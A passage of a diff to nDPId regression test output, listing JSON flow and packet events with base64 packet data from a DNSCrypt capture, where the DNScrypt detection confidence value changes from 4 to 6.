{"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":297,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":36676,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":946739317432,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739317432,"pkt":"REREREREZmZmZmZmCABFAAXc15AgAL0Rod8KAAABsDjtq49EAbsGBJxWsmIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjEIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAW6AAwFtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":297,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":36676,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":297,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":36676,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":298,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739317432} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":298,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739317432,"pkt":"REREREREZmZmZmZmCABFAABQ15AAub0RxrIKAAABsDjtqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":49008,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":946739317432,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739317432,"pkt":"REREREREZmZmZmZmCABFAAIc15JAAL0RhZ0KAAABsDjtq79wAbsCCGC6smMBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjEIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAG+AAwBugAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":49008,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":49008,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":48325,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":946739317432,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739317432,"pkt":"REREREREZmZmZmZmCABFAAXc15EgAL0Rod4KAAABsDjtq7zFAbsGBG7RsmYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjEIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAW6AAwFtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":300,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":48325,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":300,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":48325,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":301,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739317432} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":301,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739317432,"pkt":"REREREREZmZmZmZmCABFAABQ15EAub0RxrEKAAABsDjtqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":2,"flow_last_seen":946739317434,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":946739317434,"pkt":"ZmZmZmZmRERERERECABFAADXKh9AADQRgTsznqZhCgAAAQG7u8EAw9AjB2GBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAQt4OLzm4x3OBnTPVYOyWbwQ07ZuPzfh5UHeUSDpkuLilk8PnzqIG19XCvUsQGZmTzZ+d2RjpSDvvlP\/+37YoDPjwKVuBVGSevZiWx3QxU\/Ww92uJXMr1\/GUOUVCxbO0A+PApW4FUZJwAAAAFfU6w6X1T9ug=="} @@ -612,28 +612,28 @@ 00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":2,"flow_last_seen":946739317462,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":946739317462,"pkt":"ZmZmZmZmRERERERECABFAADcYmgAADoRvwiwOO2rCgAAAQG7j0QAyAhasmKBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjEIZG5zY3J5cHQCZXUAABAAAcAMABAAAQAAAAAAfXxETlNDAAIAABl3+ykQSZujAz2k88UgiWZ8EW8WsV\/cZTbX4vJmZY7W5pQMpzujkuwlfjXc+3bckBxwziAxuzLgEVuJhZegpADIiVqOfVhh6bINcwjX2cKXslxwpVLP3wwY1fcQglCKacmJWo59WGHpX1OncV9Tp3FfVPjx"} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":60091,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":946739317462,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739317462,"pkt":"REREREREZmZmZmZmCABFAAIcwFtAAL0RvgEKAAABstjJ3uq7CAUCCD+NfScBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlzb2x0eXNpYWsDY29tAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":60091,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":60091,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52356,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":946739317462,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739317462,"pkt":"REREREREZmZmZmZmCABFAAXcwFwgAL0R2kAKAAABstjJ3syECAUGBG5EfSQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlzb2x0eXNpYWsDY29tAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 